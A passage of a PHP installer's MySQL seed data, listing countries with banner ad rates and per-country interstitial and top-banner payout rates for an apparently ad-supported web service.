	(246, 'AF', 'Afghanistan', '', 0.00, 0, 0, 'Banner'),
	(247, 'AL', 'Albania', '', 0.00, 0, 0, 'Banner'),
	(248, 'DZ', 'Algeria', '', 0.20, 1, 0, 'Banner'),
	(249, 'AS', 'American Samoa', '', 0.00, 0, 0, 'Banner'),
	(250, 'AD', 'Andorra', '', 0.00, 0, 0, 'Banner'),
	(251, 'AO', 'Angola', '', 0.00, 0, 0, 'Banner'),
	(252, 'AI', 'Anguilla', '', 0.00, 0, 0, 'Banner'),
	(253, 'AQ', 'Antarctica', '', 0.00, 0, 0, 'Banner'),
	(254, 'AG', 'Antigua And Barbuda', '', 0.00, 0, 0, 'Banner'),
	(255, 'AR', 'Argentina', '', 0.20, 1, 0, 'Banner'),
	(256, 'AM', 'Armenia', '', 0.00, 0, 0, 'Banner'),
	(257, 'AW', 'Aruba', '', 0.00, 0, 0, 'Banner'),
	(258, 'AU', 'Australia', '', 0.60, 1, 0, 'Banner'),
	(259, 'AT', 'Austria', '', 0.40, 1, 0, 'Banner'),
	(260, 'AZ', 'Azerbaijan', '', 0.00, 0, 0, 'Banner'),
	(261, 'BS', 'Bahamas', '', 0.00, 0, 0, 'Banner'),
	(262, 'BH', 'Bahrain', '', 0.00, 0, 0, 'Banner'),
	(263, 'BD', 'Bangladesh', '', 0.20, 1, 0, 'Banner'),
	(264, 'BB', 'Barbados', '', 0.00, 0, 0, 'Banner'),
	(265, 'BY', 'Belarus', '', 0.00, 0, 0, 'Banner'),
	(266, 'BE', 'Belgium', '', 0.40, 1, 0, 'Banner'),
	(267, 'BZ', 'Belize', '', 0.00, 0, 0, 'Banner'),
	(268, 'BJ', 'Benin', '', 0.00, 0, 0, 'Banner'),
	(269, 'BM', 'Bermuda', '', 0.00, 0, 0, 'Banner'),
	(270, 'BT', 'Bhutan', '', 0.00, 0, 0, 'Banner'),
	(271, 'BO', 'Bolivia', '', 0.00, 0, 0, 'Banner'),
	(272, 'BA', 'Bosnia And Herzegowina', '', 0.60, 1, 0, 'Banner'),
	(273, 'BW', 'Botswana', '', 0.00, 0, 0, 'Banner'),
	(274, 'BV', 'Bouvet Island', '', 0.00, 0, 0, 'Banner'),
	(275, 'BR', 'Brazil', '', 0.30, 1, 0, 'Banner'),
	(276, 'IO', 'British Indian Ocean Territory', '', 0.00, 0, 0, 'Banner'),
	(277, 'BN', 'Brunei Darussalam', '', 0.00, 0, 0, 'Banner'),
	(278, 'BG', 'Bulgaria', '', 0.40, 1, 0, 'Banner'),
	(279, 'BF', 'Burkina Faso', '', 0.00, 0, 0, 'Banner'),
	(280, 'BI', 'Burundi', '', 0.00, 0, 0, 'Banner'),
	(281, 'KH', 'Cambodia', '', 0.00, 0, 0, 'Banner'),
	(282, 'CM', 'Cameroon', '', 0.00, 0, 0, 'Banner'),
	(283, 'CA', 'Canada', '', 0.60, 1, 0, 'Banner'),
	(284, 'CV', 'Cape Verde', '', 0.00, 0, 0, 'Banner'),
	(285, 'KY', 'Cayman Islands', '', 0.00, 0, 0, 'Banner'),
	(286, 'CF', 'Central African Republic', '', 0.00, 0, 0, 'Banner'),
	(287, 'TD', 'Chad', '', 0.00, 0, 0, 'Banner'),
	(288, 'CL', 'Chile', '', 0.20, 1, 0, 'Banner'),
	(289, 'CN', 'China', '', 0.20, 1, 0, 'Banner'),
	(290, 'CX', 'Christmas Island', '', 0.00, 0, 0, 'Banner'),
	(291, 'CC', 'Cocos (Keeling) Islands', '', 0.00, 0, 0, 'Banner'),
	(292, 'CO', 'Colombia', '', 0.20, 1, 0, 'Banner'),
	(293, 'KM', 'Comoros', '', 0.00, 0, 0, 'Banner'),
	(294, 'CG', 'Congo', '', 0.00, 0, 0, 'Banner'),
	(295, 'CD', 'Congo, The Democratic Republic Of The', '', 0.00, 0, 0, 'Banner'),
	(296, 'CK', 'Cook Islands', '', 0.00, 0, 0, 'Banner'),
	(297, 'CR', 'Costa Rica', '', 0.00, 0, 0, 'Banner'),
	(298, 'CI', 'Cote D''Ivoire', '', 0.00, 0, 0, 'Banner'),
	(299, 'HR', 'Croatia (Local Name: Hrvatska)', '', 0.40, 1, 0, 'Banner'),
	(300, 'CU', 'Cuba', '', 0.00, 0, 0, 'Banner'),
	(301, 'CY', 'Cyprus', '', 0.60, 1, 0, 'Banner'),
	(302, 'CZ', 'Czech Republic', '', 0.40, 1, 0, 'Banner'),
	(303, 'DK', 'Denmark', '', 0.40, 1, 0, 'Banner'),
	(304, 'DJ', 'Djibouti', '', 0.00, 0, 0, 'Banner'),
	(305, 'DM', 'Dominica', '', 0.00, 0, 0, 'Banner'),
	(306, 'DO', 'Dominican Republic', '', 0.00, 0, 0, 'Banner'),
	(307, 'TP', 'East Timor', '', 0.00, 0, 0, 'Banner'),
	(308, 'EC', 'Ecuador', '', 0.20, 1, 0, 'Banner'),
	(309, 'EG', 'Egypt', '', 0.20, 1, 0, 'Banner'),
	(310, 'SV', 'El Salvador', '', 0.00, 0, 0, 'Banner'),
	(311, 'GQ', 'Equatorial Guinea', '', 0.00, 0, 0, 'Banner'),
	(312, 'ER', 'Eritrea', '', 0.00, 0, 0, 'Banner'),
	(313, 'EE', 'Estonia', '', 0.00, 0, 0, 'Banner'),
	(314, 'ET', 'Ethiopia', '', 0.00, 0, 0, 'Banner'),
	(315, 'FK', 'Falkland Islands (Malvinas)', '', 0.00, 0, 0, 'Banner'),
	(316, 'FO', 'Faroe Islands', '', 0.00, 0, 0, 'Banner'),
	(317, 'FJ', 'Fiji', '', 0.00, 0, 0, 'Banner'),
	(318, 'FI', 'Finland', '', 0.40, 1, 0, 'Banner'),
	(319, 'FR', 'France', '', 0.60, 1, 0, 'Banner'),
	(320, 'FX', 'France, Metropolitan', '', 0.00, 0, 0, 'Banner'),
	(321, 'GF', 'French Guiana', '', 0.00, 0, 0, 'Banner'),
	(322, 'PF', 'French Polynesia', '', 0.00, 0, 0, 'Banner'),
	(323, 'TF', 'French Southern Territories', '', 0.00, 0, 0, 'Banner'),
	(324, 'GA', 'Gabon', '', 0.00, 0, 0, 'Banner'),
	(325, 'GM', 'Gambia', '', 0.00, 0, 0, 'Banner'),
	(326, 'GE', 'Georgia', '', 0.00, 0, 0, 'Banner'),
	(327, 'DE', 'Germany', '', 0.60, 1, 0, 'Banner'),
	(328, 'GH', 'Ghana', '', 0.00, 0, 0, 'Banner'),
	(329, 'GI', 'Gibraltar', '', 0.00, 0, 0, 'Banner'),
	(330, 'GR', 'Greece', '', 0.60, 1, 0, 'Banner'),
	(331, 'GL', 'Greenland', '', 0.00, 0, 0, 'Banner'),
	(332, 'GD', 'Grenada', '', 1.00, 0, 0, 'Banner'),
	(333, 'GP', 'Guadeloupe', '', 0.00, 0, 0, 'Banner'),
	(334, 'GU', 'Guam', '', 0.00, 0, 0, 'Banner'),
	(335, 'GT', 'Guatemala', '', 0.00, 0, 0, 'Banner'),
	(336, 'GN', 'Guinea', '', 0.00, 0, 0, 'Banner'),
	(337, 'GW', 'Guinea-Bissau', '', 0.00, 0, 0, 'Banner'),
	(338, 'GY', 'Guyana', '', 0.00, 0, 0, 'Banner'),
	(339, 'HT', 'Haiti', '', 0.00, 0, 0, 'Banner'),
	(340, 'HM', 'Heard And Mc Donald Islands', '', 0.00, 0, 0, 'Banner'),
	(341, 'VA', 'Holy See (Vatican City State)', '', 0.00, 0, 0, 'Banner'),
	(342, 'HN', 'Honduras', '', 0.00, 1, 0, 'Banner'),
	(343, 'HK', 'Hong Kong', '', 0.40, 1, 0, 'Banner'),
	(344, 'HU', 'Hungary', '', 0.40, 1, 0, 'Banner'),
	(345, 'IS', 'Iceland', '', 0.00, 0, 0, 'Banner'),
	(346, 'IN', 'India', '', 0.40, 1, 0, 'Banner'),
	(347, 'ID', 'Indonesia', '', 0.10, 1, 0, 'Banner'),
	(348, 'IR', 'Iran (Islamic Republic Of)', '', 0.00, 0, 0, 'Banner'),
	(349, 'IQ', 'Iraq', '', 0.00, 0, 0, 'Banner'),
	(350, 'IE', 'Ireland', '', 0.60, 1, 0, 'Banner'),
	(351, 'IL', 'Israel', '', 0.20, 1, 0, 'Banner'),
	(352, 'IT', 'Italy', '', 0.40, 1, 0, 'Banner'),
	(353, 'JM', 'Jamaica', '', 0.00, 0, 0, 'Banner'),
	(354, 'JP', 'Japan', '', 0.40, 1, 0, 'Banner'),
	(355, 'JO', 'Jordan', '', 0.00, 0, 0, 'Banner'),
	(356, 'KZ', 'Kazakhstan', '', 0.00, 0, 0, 'Banner'),
	(357, 'KE', 'Kenya', '', 0.00, 0, 0, 'Banner'),
	(358, 'KI', 'Kiribati', '', 0.00, 0, 0, 'Banner'),
	(359, 'KP', 'Korea, Democratic People''s Republic Of', '', 0.00, 0, 0, 'Banner'),
	(360, 'KR', 'Korea, Republic Of', '', 0.60, 1, 0, 'Banner'),
	(361, 'KW', 'Kuwait', '', 0.00, 0, 0, 'Banner'),
	(362, 'KG', 'Kyrgyzstan', '', 0.00, 0, 0, 'Banner'),
	(363, 'LA', 'Lao People''s Democratic Republic', '', 0.00, 0, 0, 'Banner'),
	(364, 'LV', 'Latvia', '', 0.40, 1, 0, 'Banner'),
	(365, 'LB', 'Lebanon', '', 0.00, 0, 0, 'Banner'),
	(366, 'LS', 'Lesotho', '', 0.00, 0, 0, 'Banner'),
	(367, 'LR', 'Liberia', '', 0.00, 0, 0, 'Banner'),
	(368, 'LY', 'Libyan Arab Jamahiriya', '', 0.20, 1, 0, 'Banner'),
	(369, 'LI', 'Liechtenstein', '', 0.00, 0, 0, 'Banner'),
	(370, 'LT', 'Lithuania', '', 0.20, 1, 0, 'Banner'),
	(371, 'LU', 'Luxembourg', '', 0.00, 0, 0, 'Banner'),
	(372, 'MO', 'Macau', '', 0.20, 1, 0, 'Banner'),
	(373, 'MK', 'Macedonia, Former Yugoslav Republic Of', '', 0.20, 1, 0, 'Banner'),
	(374, 'MG', 'Madagascar', '', 0.00, 0, 0, 'Banner'),
	(375, 'MW', 'Malawi', '', 0.00, 0, 0, 'Banner'),
	(376, 'MY', 'Malaysia', '', 0.20, 1, 0, 'Banner'),
	(377, 'MV', 'Maldives', '', 0.00, 0, 0, 'Banner'),
	(378, 'ML', 'Mali', '', 0.00, 0, 0, 'Banner'),
	(379, 'MT', 'Malta', '', 0.00, 0, 0, 'Banner'),
	(380, 'MH', 'Marshall Islands', '', 0.00, 0, 0, 'Banner'),
	(381, 'MQ', 'Martinique', '', 0.00, 0, 0, 'Banner'),
	(382, 'MR', 'Mauritania', '', 0.00, 0, 0, 'Banner'),
	(383, 'MU', 'Mauritius', '', 0.00, 0, 0, 'Banner'),
	(384, 'YT', 'Mayotte', '', 0.00, 0, 0, 'Banner'),
	(385, 'MX', 'Mexico', '', 0.20, 1, 0, 'Banner'),
	(386, 'FM', 'Micronesia, Federated States Of', '', 0.00, 0, 0, 'Banner'),
	(387, 'MD', 'Moldova, Republic Of', '', 0.00, 0, 0, 'Banner'),
	(388, 'MC', 'Monaco', '', 0.00, 0, 0, 'Banner'),
	(389, 'MN', 'Mongolia', '', 0.00, 0, 0, 'Banner'),
	(390, 'MS', 'Montserrat', '', 0.00, 0, 0, 'Banner'),
	(391, 'MA', 'Morocco', '', 0.20, 1, 0, 'Banner'),
	(392, 'MZ', 'Mozambique', '', 0.00, 0, 0, 'Banner'),
	(393, 'MM', 'Myanmar', '', 0.00, 0, 0, 'Banner'),
	(394, 'NA', 'Namibia', '', 0.00, 0, 0, 'Banner'),
	(395, 'NR', 'Nauru', '', 0.00, 0, 0, 'Banner'),
	(396, 'NP', 'Nepal', '', 0.00, 0, 0, 'Banner'),
	(397, 'NL', 'Netherlands', '', 0.60, 1, 0, 'Banner'),
	(398, 'AN', 'Netherlands Antilles', '', 0.00, 0, 0, 'Banner'),
	(399, 'NC', 'New Caledonia', '', 0.00, 0, 0, 'Banner'),
	(400, 'NZ', 'New Zealand', '', 0.60, 1, 0, 'Banner'),
	(401, 'NI', 'Nicaragua', '', 0.00, 0, 0, 'Banner'),
	(402, 'NE', 'Niger', '', 0.00, 0, 0, 'Banner'),
	(403, 'NG', 'Nigeria', '', 0.00, 0, 0, 'Banner'),
	(404, 'NU', 'Niue', '', 0.00, 0, 0, 'Banner'),
	(405, 'NF', 'Norfolk Island', '', 0.00, 0, 0, 'Banner'),
	(406, 'MP', 'Northern Mariana Islands', '', 0.00, 0, 0, 'Banner'),
	(407, 'NO', 'Norway', '', 0.40, 1, 0, 'Banner'),
	(408, 'OM', 'Oman', '', 0.00, 0, 0, 'Banner'),
	(409, 'PK', 'Pakistan', '', 0.20, 1, 0, 'Banner'),
	(410, 'PW', 'Palau', '', 0.00, 0, 0, 'Banner'),
	(411, 'PA', 'Panama', '', 0.00, 0, 0, 'Banner'),
	(412, 'PG', 'Papua New Guinea', '', 0.00, 0, 0, 'Banner'),
	(413, 'PY', 'Paraguay', '', 0.00, 0, 0, 'Banner'),
	(414, 'PE', 'Peru', '', 0.20, 1, 0, 'Banner'),
	(415, 'PH', 'Philippines', '', 0.20, 1, 0, 'Banner'),
	(416, 'PN', 'Pitcairn', '', 0.00, 0, 0, 'Banner'),
	(417, 'PL', 'Poland', '', 0.40, 1, 0, 'Banner'),
	(418, 'PT', 'Portugal', '', 0.40, 1, 0, 'Banner'),
	(419, 'PR', 'Puerto Rico', '', 0.00, 0, 0, 'Banner'),
	(420, 'QA', 'Qatar', '', 0.00, 0, 0, 'Banner'),
	(421, 'RE', 'Reunion', '', 0.00, 0, 0, 'Banner'),
	(422, 'RO', 'Romania', '', 0.40, 1, 0, 'Banner'),
	(423, 'RU', 'Russian Federation', '', 0.20, 1, 0, 'Banner'),
	(424, 'RW', 'Rwanda', '', 0.00, 0, 0, 'Banner'),
	(425, 'KN', 'Saint Kitts And Nevis', '', 0.00, 0, 0, 'Banner'),
	(426, 'LC', 'Saint Lucia', '', 0.00, 0, 0, 'Banner'),
	(427, 'VC', 'Saint Vincent And The Grenadines', '', 0.00, 0, 0, 'Banner'),
	(428, 'WS', 'Samoa', '', 0.00, 0, 0, 'Banner'),
	(429, 'SM', 'San Marino', '', 0.00, 0, 0, 'Banner'),
	(430, 'ST', 'Sao Tome And Principe', '', 0.00, 0, 0, 'Banner'),
	(431, 'SA', 'Saudi Arabia', '', 0.20, 1, 0, 'Banner'),
	(432, 'SN', 'Senegal', '', 0.00, 0, 0, 'Banner'),
	(433, 'SC', 'Seychelles', '', 0.00, 0, 0, 'Banner'),
	(434, 'SL', 'Sierra Leone', '', 0.00, 0, 0, 'Banner'),
	(435, 'SG', 'Singapore', '', 0.60, 1, 0, 'Banner'),
	(436, 'SK', 'Slovakia (Slovak Republic)', '', 0.40, 1, 0, 'Banner'),
	(437, 'SI', 'Slovenia', '', 0.20, 1, 0, 'Banner'),
	(438, 'SB', 'Solomon Islands', '', 0.00, 0, 0, 'Banner'),
	(439, 'SO', 'Somalia', '', 0.00, 0, 0, 'Banner'),
	(440, 'ZA', 'South Africa', '', 0.40, 1, 0, 'Banner'),
	(441, 'GS', 'South Georgia, South Sandwich Islands', '', 0.00, 0, 0, 'Banner'),
	(442, 'ES', 'Spain', '', 0.40, 1, 0, 'Banner'),
	(443, 'LK', 'Sri Lanka', '', 0.00, 0, 0, 'Banner'),
	(444, 'SH', 'St. Helena', '', 0.00, 0, 0, 'Banner'),
	(445, 'PM', 'St. Pierre And Miquelon', '', 0.00, 0, 0, 'Banner'),
	(446, 'SD', 'Sudan', '', 0.00, 0, 0, 'Banner'),
	(447, 'SR', 'Suriname', '', 0.00, 0, 0, 'Banner'),
	(448, 'SJ', 'Svalbard And Jan Mayen Islands', '', 0.00, 0, 0, 'Banner'),
	(449, 'SZ', 'Swaziland', '', 0.00, 0, 0, 'Banner'),
	(450, 'SE', 'Sweden', '', 0.40, 1, 0, 'Banner'),
	(451, 'CH', 'Switzerland', '', 0.40, 1, 0, 'Banner'),
	(452, 'SY', 'Syrian Arab Republic', '', 0.00, 0, 0, 'Banner'),
	(453, 'TW', 'Taiwan', '', 0.20, 1, 0, 'Banner'),
	(454, 'TJ', 'Tajikistan', '', 0.00, 0, 0, 'Banner'),
	(455, 'TZ', 'Tanzania, United Republic Of', '', 0.00, 0, 0, 'Banner'),
	(456, 'TH', 'Thailand', '', 0.10, 1, 0, 'Banner'),
	(457, 'TG', 'Togo', '', 0.00, 0, 0, 'Banner'),
	(458, 'TK', 'Tokelau', '', 0.00, 0, 0, 'Banner'),
	(459, 'TO', 'Tonga', '', 0.00, 0, 0, 'Banner'),
	(460, 'TT', 'Trinidad And Tobago', '', 0.00, 0, 0, 'Banner'),
	(461, 'TN', 'Tunisia', '', 0.20, 1, 0, 'Banner'),
	(462, 'TR', 'Turkey', '', 0.60, 1, 0, 'Banner'),
	(463, 'TM', 'Turkmenistan', '', 0.00, 0, 0, 'Banner'),
	(464, 'TC', 'Turks And Caicos Islands', '', 0.00, 0, 0, 'Banner'),
	(465, 'TV', 'Tuvalu', '', 0.00, 0, 0, 'Banner'),
	(466, 'UG', 'Uganda', '', 0.00, 0, 0, 'Banner'),
	(467, 'UA', 'Ukraine', '', 0.20, 1, 0, 'Banner'),
	(468, 'AE', 'United Arab Emirates', '', 0.60, 1, 0, 'Banner'),
	(469, 'UM', 'United States Minor Outlying Islands', '', 0.00, 0, 0, 'Banner'),
	(470, 'UY', 'Uruguay', '', 0.00, 0, 0, 'Banner'),
	(471, 'UZ', 'Uzbekistan', '', 0.00, 0, 0, 'Banner'),
	(472, 'VU', 'Vanuatu', '', 0.00, 0, 0, 'Banner'),
	(473, 'VE', 'Venezuela', '', 0.40, 1, 0, 'Banner'),
	(474, 'VN', 'Viet Nam', '', 0.10, 1, 0, 'Banner'),
	(475, 'VG', 'Virgin Islands (British)', '', 0.00, 0, 0, 'Banner'),
	(476, 'VI', 'Virgin Islands (U.S.)', '', 0.00, 0, 0, 'Banner'),
	(477, 'WF', 'Wallis And Futuna Islands', '', 0.00, 0, 0, 'Banner'),
	(478, 'EH', 'Western Sahara', '', 0.00, 0, 0, 'Banner'),
	(479, 'YE', 'Yemen', '', 0.00, 0, 0, 'Banner'),
	(480, 'YU', 'Yugoslavia', '', 0.00, 0, 0, 'Banner'),
	(481, 'ZM', 'Zambia', '', 0.00, 0, 0, 'Banner'),
	(482, 'ZW', 'Zimbabwe', '', 0.00, 0, 0, 'Banner');
MYSQL;
	$data[] = <<< MYSQL
	INSERT INTO `{$TABLE_PREPEND}payouts` (`id`, `code`, `name`, `u_interstitial`, `u_top_banner`, `r_interstitial`, `r_top_banner`, `active`, `zorder`) VALUES
	(1, 'O1', 'All other countries', 0.50, 0.15, 0.00, 0.00, 1, 1),
	(2, 'A1', 'Proxy Traffic Deal', 0.58, 0.31, 0.00, 0.00, 1, 0),
	(3, 'US', 'United States', 4.43, 1.98, 0.00, 1.00, 1, -2),
	(4, 'GB', 'United Kingdom', 2.95, 0.98, 0.00, 0.00, 1, -1),
	(5, 'AF', 'Afghanistan', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(6, 'AL', 'Albania', 0.71, 0.20, 0.00, 0.00, 0, 0),
	(7, 'DZ', 'Algeria', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(8, 'AS', 'American Samoa', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(9, 'AD', 'Andorra', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(10, 'AO', 'Angola', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(11, 'AI', 'Anguilla', 0.66, 0.06, 0.00, 0.00, 0, 0),
	(12, 'AQ', 'Antarctica', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(13, 'AG', 'Antigua And Barbuda', 0.58, 0.15, 0.00, 0.00, 0, 0),
	(14, 'AR', 'Argentina', 1.04, 0.17, 0.00, 0.00, 0, 0),
	(15, 'AM', 'Armenia', 0.69, 0.20, 0.00, 0.00, 0, 0),
	(16, 'AW', 'Aruba', 0.58, 0.17, 0.00, 0.00, 0, 0),
	(17, 'AU', 'Australia', 2.44, 2.27, 0.00, 0.00, 1, -1),
	(18, 'AT', 'Austria', 1.47, 1.05, 0.00, 0.00, 0, 0),
	(19, 'AZ', 'Azerbaijan', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(20, 'BS', 'Bahamas', 0.58, 0.14, 0.00, 0.00, 0, 0),
	(21, 'BH', 'Bahrain', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(22, 'BD', 'Bangladesh', 1.01, 0.19, 0.00, 0.00, 0, 0),
	(23, 'BB', 'Barbados', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(24, 'BY', 'Belarus', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(25, 'BE', 'Belgium', 1.17, 0.21, 0.00, 0.00, 0, 0),
	(26, 'BZ', 'Belize', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(27, 'BJ', 'Benin', 1.01, 0.06, 0.00, 0.00, 0, 0),
	(28, 'BM', 'Bermuda', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(29, 'BT', 'Bhutan', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(30, 'BO', 'Bolivia', 1.20, 0.18, 0.00, 0.00, 0, 0),
	(31, 'BA', 'Bosnia And Herzegowina', 0.63, 0.41, 0.00, 0.00, 0, 0),
	(32, 'BW', 'Botswana', 0.82, 0.21, 0.00, 0.00, 0, 0),
	(33, 'BV', 'Bouvet Island', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(34, 'BR', 'Brazil', 1.20, 0.27, 0.00, 0.00, 0, 0),
	(35, 'IO', 'British Indian Ocean Territory', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(36, 'BN', 'Brunei Darussalam', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(37, 'BG', 'Bulgaria', 0.89, 0.22, 0.00, 0.00, 0, 0),
	(38, 'BF', 'Burkina Faso', 0.59, 0.06, 0.00, 0.00, 0, 0),
	(39, 'BI', 'Burundi', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(40, 'KH', 'Cambodia', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(41, 'CM', 'Cameroon', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(42, 'CA', 'Canada', 3.00, 0.61, 1.25, 0.20, 1, -2),
	(43, 'CV', 'Cape Verde', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(44, 'KY', 'Cayman Islands', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(45, 'CF', 'Central African Republic', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(46, 'TD', 'Chad', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(47, 'CL', 'Chile', 1.41, 0.19, 0.00, 0.00, 0, 0),
	(48, 'CN', 'China', 0.22, 0.17, 0.00, 0.00, 0, 0),
	(49, 'CX', 'Christmas Island', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(50, 'CC', 'Cocos (Keeling) Islands', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(51, 'CO', 'Colombia', 1.30, 0.19, 0.00, 0.00, 0, 0),
	(52, 'KM', 'Comoros', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(53, 'CG', 'Congo', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(54, 'CD', 'Congo, The Democratic Republic Of The', 0.57, 0.06, 0.00, 0.00, 0, 0),
	(55, 'CK', 'Cook Islands', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(56, 'CR', 'Costa Rica', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(57, 'CI', 'Cote D''Ivoire', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(58, 'HR', 'Croatia (Local Name: Hrvatska)', 0.57, 0.57, 0.00, 0.00, 0, 0),
	(59, 'CU', 'Cuba', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(60, 'CY', 'Cyprus', 1.51, 0.21, 0.00, 0.00, 0, 0),
	(61, 'CZ', 'Czech Republic', 0.73, 0.22, 0.00, 0.00, 0, 0),
	(62, 'DK', 'Denmark', 1.95, 0.21, 0.00, 0.00, 0, 0),
	(63, 'DJ', 'Djibouti', 0.77, 0.06, 0.00, 0.00, 0, 0),
	(64, 'DM', 'Dominica', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(65, 'DO', 'Dominican Republic', 0.77, 0.15, 0.00, 0.00, 0, 0),
	(66, 'TP', 'East Timor', 0.61, 0.06, 0.00, 0.00, 0, 0),
	(67, 'EC', 'Ecuador', 0.83, 0.18, 0.00, 0.00, 0, 0),
	(68, 'EG', 'Egypt', 0.62, 0.44, 0.00, 0.00, 0, 0),
	(69, 'SV', 'El Salvador', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(70, 'GQ', 'Equatorial Guinea', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(71, 'ER', 'Eritrea', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(72, 'EE', 'Estonia', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(73, 'ET', 'Ethiopia', 0.83, 0.06, 0.00, 0.00, 0, 0),
	(74, 'FK', 'Falkland Islands (Malvinas)', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(75, 'FO', 'Faroe Islands', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(76, 'FJ', 'Fiji', 0.71, 0.21, 0.00, 0.00, 0, 0),
	(77, 'FI', 'Finland', 2.20, 0.37, 0.00, 0.00, 0, 0),
	(78, 'FR', 'France', 1.41, 0.43, 0.00, 0.00, 0, 0),
	(79, 'FX', 'France, Metropolitan', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(80, 'GF', 'French Guiana', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(81, 'PF', 'French Polynesia', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(82, 'TF', 'French Southern Territories', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(83, 'GA', 'Gabon', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(84, 'GM', 'Gambia', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(85, 'GE', 'Georgia', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(86, 'DE', 'Germany', 1.30, 0.58, 0.00, 0.00, 0, 0),
	(87, 'GH', 'Ghana', 0.66, 0.26, 0.00, 0.00, 0, 0),
	(88, 'GI', 'Gibraltar', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(89, 'GR', 'Greece', 1.01, 2.06, 0.00, 0.00, 0, 0),
	(90, 'GL', 'Greenland', 0.85, 0.06, 0.00, 0.00, 0, 0),
	(91, 'GD', 'Grenada', 0.57, 0.18, 0.00, 0.00, 0, 0),
	(92, 'GP', 'Guadeloupe', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(93, 'GU', 'Guam', 0.60, 0.17, 0.00, 0.00, 0, 0),
	(94, 'GT', 'Guatemala', 0.65, 0.14, 0.00, 0.00, 0, 0),
	(95, 'GN', 'Guinea', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(96, 'GW', 'Guinea-Bissau', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(97, 'GY', 'Guyana', 0.93, 0.15, 0.00, 0.00, 0, 0),
	(98, 'HT', 'Haiti', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(99, 'HM', 'Heard And Mc Donald Islands', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(100, 'VA', 'Holy See (Vatican City State)', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(101, 'HN', 'Honduras', 0.60, 0.21, 0.00, 0.00, 0, 0),
	(102, 'HK', 'Hong Kong', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(103, 'HU', 'Hungary', 1.08, 0.21, 0.00, 0.00, 0, 0),
	(104, 'IS', 'Iceland', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(105, 'IN', 'India', 0.60, 0.40, 0.00, 0.00, 0, 0),
	(106, 'ID', 'Indonesia', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(107, 'IR', 'Iran (Islamic Republic Of)', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(108, 'IQ', 'Iraq', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(109, 'IE', 'Ireland', 2.54, 0.55, 0.00, 0.00, 0, 0),
	(110, 'IL', 'Israel', 1.98, 0.20, 0.00, 0.00, 0, 0),
	(111, 'IT', 'Italy', 1.89, 0.33, 0.00, 0.00, 0, 0),
	(112, 'JM', 'Jamaica', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(113, 'JP', 'Japan', 1.20, 0.37, 0.00, 0.00, 0, 0),
	(114, 'JO', 'Jordan', 1.65, 0.18, 0.00, 0.00, 0, 0),
	(115, 'KZ', 'Kazakhstan', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(116, 'KE', 'Kenya', 0.68, 0.19, 0.00, 0.00, 0, 0),
	(117, 'KI', 'Kiribati', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(118, 'KP', 'Korea, Democratic People''s Republic Of', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(119, 'KR', 'Korea, Republic Of', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(120, 'KW', 'Kuwait', 0.58, 0.21, 0.00, 0.00, 0, 0),
	(121, 'KG', 'Kyrgyzstan', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(122, 'LA', 'Lao People''s Democratic Republic', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(123, 'LV', 'Latvia', 1.24, 0.34, 0.00, 0.00, 0, 0),
	(124, 'LB', 'Lebanon', 1.65, 0.25, 0.00, 0.00, 0, 0),
	(125, 'LS', 'Lesotho', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(126, 'LR', 'Liberia', 0.00, 0.00, 0.00, 0.00, 0, 0),
